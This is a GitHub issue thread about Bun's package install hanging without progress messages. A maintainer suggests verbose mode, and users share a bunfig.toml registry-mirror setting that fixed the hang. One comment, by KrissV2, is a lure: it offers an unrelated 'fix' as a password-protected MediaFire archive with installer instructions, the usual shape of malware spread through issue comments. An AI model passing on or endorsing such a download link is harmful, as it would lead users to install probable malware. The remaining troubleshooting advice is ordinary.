### ISSUE TITLE
Frequent lag without prompts when downloading libraries

### ISSUE THREAD

**Issue by WangZhongDian** [oven-sh/bun#13644]
### What is the problem this feature would solve?

1.  More intuitive visibility of the progress of downloading libraries
2. Intuitive error prompts

### What is the feature you are proposing to solve the problem?

1. Increase download progress and network speed display
2. Display the cause as much as possible when stuck
3. Suggest adding a download proxy function

`The following situations often occur, stuck for a long time without any prompts`
![截图 2024-08-31 12-55-22](https://github.com/user-attachments/assets/ec85ec67-8216-479a-939c-e0ba38c889c1)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Jarred-Sumner** [comment]
Can you run `bun install --verbose`? It will show more information

**Comment by HONGLK** [comment]
I sucked as well

OS: windows 11,
bun: v1.1.26,

![image](https://github.com/user-attachments/assets/3149b59e-d779-4781-a9b6-8b18f0d25821)

It stuck forever

**Comment by WangZhongDian** [comment]
It seems possible to set a proxy for bunfig.toml to improve download speed，It solved my problem

**Comment by HONGLK** [comment]
> It seems possible to set a proxy for bunfig.toml to improve download speed，It solved my problem

@WangZhongDian How to setup this proxy configuration, may you provide your configuration to me as reference?

Really appreciate!

**Comment by WangZhongDian** [comment]
@HONGLK 
```
[install]
registry = "https://registry.npmmirror.com/"
```

**Comment by WangZhongDian** [comment]
@HONGLK 
You need to create a `. bunfig.toml ` in the home directory

**Comment by HONGLK** [comment]
@WangZhongDian 
Thanks for you reply, it helps a lot, I will try more with `.bugfig.toml`
